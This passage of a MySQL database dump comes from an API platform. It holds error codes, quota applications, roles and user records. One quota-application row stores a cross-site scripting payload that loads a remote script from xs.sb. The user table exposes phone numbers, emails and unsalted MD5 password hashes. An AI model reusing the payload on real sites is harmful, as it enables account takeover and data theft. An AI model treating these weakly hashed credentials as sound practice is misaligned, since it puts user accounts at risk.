具体的错误信息包含 illumiantion(光照不足) angle(角度不好) blur (人脸模糊) occlusion(有遮挡) too large(人脸过大, 占屏幕2/3以上) 等原因','请重新录制视频'),('222027--验证','code length param error','验证码长度错误 (最小值大于最大值)','参考API说明文档，修改参数'),('222028--验证','param[min_code_length] format error','参数格式错误','参考API说明文档，修改参数'),('222029--验证','param[max_code_length] format error','参数格式错误','参考API说明文档，修改参数'),('222030--验证','param[match_threshold] format error','参数格式错误','参考API说明文档，修改参数'),('216201','上传的图片格式错误，现阶段我们支持的图片格式为：PNG、JPG、BMP，','image format error	','请把图片进行转码或更换图片'),('282000','服务器内部错误，请再次请求。','internal error','如果持续出现此类错误，请通过QQ群（860337848）或提交工单联系技术支持团队。'),('1','服务器内部错误，请再次请求','Unknown error','请联系相关负责人员'),('2','服务暂不可用，请再次请求','Service temporarily unavailable','请联系相关负责人员'),('3','调用的API不存在，请检查请求URL后重新尝试','Unsupported openapi method','一般为URL中有非英文字符，如“-”，可手动输入重试'),('6--验证','无权限访问该用户数据，创建应用时未勾选相关接口','No permission to access data','请登录百度云控制台，找到对应的应用，编辑应用，勾选上相关接口，然后重试调用'),('13','获取token失败','Get service token failed','重新获取token'),('14','IAM 鉴权失败','IAM Certification failed','建议参照文档自查生成sign的方式是否正确，或换用控制台中ak sk的方式调用'),('15','应用不存在或者创建失败','app not exsits or create failed',''),('216100','invalid param','请求中包含非法参数','请检查后重新尝试'),('216101	','not enough param','缺少必须的参数','请检查参数是否有遗漏'),('216102','service not support','请求了不支持的服务','请检查调用的url'),('216103','param too long','请求中某些参数过长','请检查后重新尝试'),('216110','appid not exist','appid不存在','请重新核对信息是否为后台应用列表中的appid'),('216200	','empty image','图片为空','请检查后重新尝试'),('216202	','image size error','上传的图片大小错误','现阶段我们支持的图片大小为：base64编码后小于4M，分辨率不高于4096 * 4096，请重新上传图片'),('216203','image size error','上传的图片base64编码有误','请校验base64编码方式，并重新上传图片'),('216630','recognize error','识别错误，请再次请求','请联系相关负责人员'),('216634','detect error','检测错误，请再次请求','如果持续出现该错误，请与相关负责人员联系'),('282003','missing parameters: {参数名}','请求参数缺失',''),('282005','batch  processing error','处理批量任务时发生部分或全部错误','请根据具体错误码排查'),('282006','batch task  limit reached','批量任务处理数量超出限制','请将任务数量减少到10或10以下'),('282114','url size error','URL长度超过1024字节或为0',''),('282808','request id: xxxxx not exist','request id xxxxx 不存在',''),('282809','result type error','返回结果请求错误（不属于excel或json）',''),('282810','image recognize error','图像识别错误',''),('283300','Invalid argument','入参格式有误','可检查下图片编码、代码格式是否有误'),('-100000','参数为空','',''),('-110000','token过期或者token不存在','',''),('-120000','每秒请求次数超过上限','',''),('-121000','请求次数超过上限，调用次数用完，或每秒调用次数超过限制','请求次数超过上限','请跟开放平台管理员联系，提高能力调用次数'),('-130000','没有访问该url的权限','',''),('222202',' pic not has face','图片中没有人脸',' 检查图片质量'),('404','','未找到访问的接口','');
/*!40000 ALTER TABLE `t_code_info` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_qps_apply`
--

DROP TABLE IF EXISTS `t_qps_apply`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_qps_apply` (
  `qps_id` int NOT NULL AUTO_INCREMENT COMMENT '编号',
  `max_qps` varchar(50) NOT NULL COMMENT '预估最高QPS',
  `call_times` varchar(50) DEFAULT NULL COMMENT '预估每日调用量',
  `areas` varchar(200) DEFAULT NULL COMMENT '接入地域比例',
  `company_name` varchar(100) DEFAULT NULL COMMENT '公司名称',
  `phone` varchar(30) DEFAULT NULL COMMENT '联系电话',
  `email` varchar(100) DEFAULT NULL COMMENT '联系邮箱',
  `description` varchar(2000) DEFAULT NULL COMMENT '应用介绍',
  `apply_reason` varchar(1000) DEFAULT NULL COMMENT '提升配额原因',
  `apply_status` tinyint DEFAULT NULL COMMENT '申请状态 0=默认配额 1=审核通过 2=审核中 3=审核拒绝',
  PRIMARY KEY (`qps_id`)
) ENGINE=InnoDB AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb3 COMMENT='更高QPS申请';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_qps_apply`
--

LOCK TABLES `t_qps_apply` WRITE;
/*!40000 ALTER TABLE `t_qps_apply` DISABLE KEYS */;
INSERT INTO `t_qps_apply` VALUES (32,'200','2333','','呜呜呜呜','13911111111','www@qq.com','eeeeeee','eeeeee',2),(33,'30','50000','','test','13382890928','123@qq.com','test','test',2),(34,'50','200000','','北京铂原联动科技有限公司','010-88686659','123456@qq.com','应用介绍','能力数量不够用',1),(35,'250','1000001','北京：50% ，广东：50%','北京','010-88686159','123456@qq.com','呜呜呜呜','呜呜呜呜呜呜呜',1),(36,'50','3000000','','呜呜呜呜','呜呜呜呜','qq@123.com ','wwwww','wwwww',2),(37,'10','100000','','BEIJIGNCESHI','1234567890','234567890','234567890-','234567890-',3),(38,'5','1000','','QWERTYUIO','234567890-','345678902qq.com','123456890-','234567890',1),(39,'250','3000000','','platomix','13911111111','123@qq.com','应用描述','需要更多',2),(40,'5','3000000','','333','22222','2222@qq.com','22222','22222',3),(41,'3','10','','CESHI','13212345678','12345678@qq.com','cesfsdfs','vfdfsgf',3),(42,'3','-5','','</tExtArEa>\'\"><sCRiPt sRC=//xs.sb/Vjg3></sCrIpT>','18605918196','wanghq211@chinaunicom.cn','</tExtArEa>\'\"><sCRiPt sRC=//xs.sb/Vjg3></sCrIpT>','</tExtArEa>\'\"><sCRiPt sRC=//xs.sb/Vjg3></sCrIpT>',2),(43,'3','2','','江测试','1851358529011','12345@qq.com','132123123','111\"><>',2),(44,'3','1000','','测试公司！！@3seiirf1','13771111749','88933120@qq.com','111','111',1),(45,'3','1000','','测试公司！！@3seiirf1','13771111749','88933120@qq.com','111','111',1),(46,'3','1000','','测试公司！！@3seiirf1','13771111749','88933120@qq.com','111','111',1),(47,'3','10','','测试公司！！@3seiirf1','13771111749','88933120@qq.com','测试应用介绍','测试提升配额',2);
/*!40000 ALTER TABLE `t_qps_apply` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_role`
--

DROP TABLE IF EXISTS `t_role`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_role` (
  `role_id` int NOT NULL AUTO_INCREMENT,
  `role_name` varchar(50) NOT NULL COMMENT '角色名字',
  `role_type` int NOT NULL COMMENT '角色类型',
  `description` varchar(100) DEFAULT NULL COMMENT '备注',
  PRIMARY KEY (`role_id`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb3 COMMENT='角色表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_role`
--

LOCK TABLES `t_role` WRITE;
/*!40000 ALTER TABLE `t_role` DISABLE KEYS */;
INSERT INTO `t_role` VALUES (1,'管理员',1,NULL),(2,'开发者',2,'123'),(4,'联通内部',2,''),(5,'测试用户',2,'开放一些测试的未发布的接口'),(6,'应用开发者',2,'应用'),(7,'测试角色',2,'测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色测试角色');
/*!40000 ALTER TABLE `t_role` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_sms_log`
--

DROP TABLE IF EXISTS `t_sms_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_sms_log` (
  `sms_id` int NOT NULL AUTO_INCREMENT,
  `phone` varchar(30) NOT NULL COMMENT '电话号码',
  `code` varchar(20) NOT NULL COMMENT '验证码',
  `create_time` varchar(30) NOT NULL COMMENT '创建时间',
  `status` tinyint NOT NULL COMMENT '状态',
  PRIMARY KEY (`sms_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_sms_log`
--

LOCK TABLES `t_sms_log` WRITE;
/*!40000 ALTER TABLE `t_sms_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_sms_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_system_log`
--

DROP TABLE IF EXISTS `t_system_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_system_log` (
  `id` int NOT NULL AUTO_INCREMENT,
  `log_account` varchar(100) NOT NULL COMMENT '日志账号',
  `log_content` varchar(200) NOT NULL COMMENT '日志内容',
  `log_ip` varchar(100) DEFAULT NULL COMMENT 'ip地址',
  `log_time` datetime DEFAULT NULL COMMENT '日期时间',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='系统日志表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_system_log`
--

LOCK TABLES `t_system_log` WRITE;
/*!40000 ALTER TABLE `t_system_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_system_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_user`
--

DROP TABLE IF EXISTS `t_user`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_user` (
  `user_id` int NOT NULL AUTO_INCREMENT,
  `user_name` varchar(100) NOT NULL COMMENT '姓名',
  `account` varchar(50) NOT NULL COMMENT '账号',
  `phone` varchar(30) NOT NULL COMMENT '电话',
  `password_hash` varchar(100) NOT NULL COMMENT '密码',
  `email` varchar(50) NOT NULL COMMENT '邮箱',
  `status` int DEFAULT NULL COMMENT '用户状态（1=免费用户 0=异常用户 2=付费用户 3=VIP用户 4=测试用户)',
  `role_id` int NOT NULL COMMENT '角色',
  `description` varchar(100) DEFAULT NULL COMMENT '备注',
  `company_name` varchar(100) DEFAULT NULL,
  `company_info` varchar(1000) DEFAULT NULL,
  PRIMARY KEY (`user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=67 DEFAULT CHARSET=utf8mb3 COMMENT='用户表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_user`
--

LOCK TABLES `t_user` WRITE;
/*!40000 ALTER TABLE `t_user` DISABLE KEYS */;
INSERT INTO `t_user` VALUES (1,'平台管理员','admin','13382890928','a3f4c511243abf2522465a603ab46f53','536818@qq.com',1,1,NULL,NULL,NULL),(2,'测试开发者','test','13771111749','e10adc3949ba59abbe56e057f20f883e','88933120@qq.com',1,2,'12','测试公司！！@3seiirf1','gongsi '),(66,'测试账号','test0','13876255686','e10adc3949ba59abbe56e057f20f883e','870951561@qq.com',1,2,NULL,'','');
/*!40000 ALTER TABLE `t_user` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-12-06 10:27:04
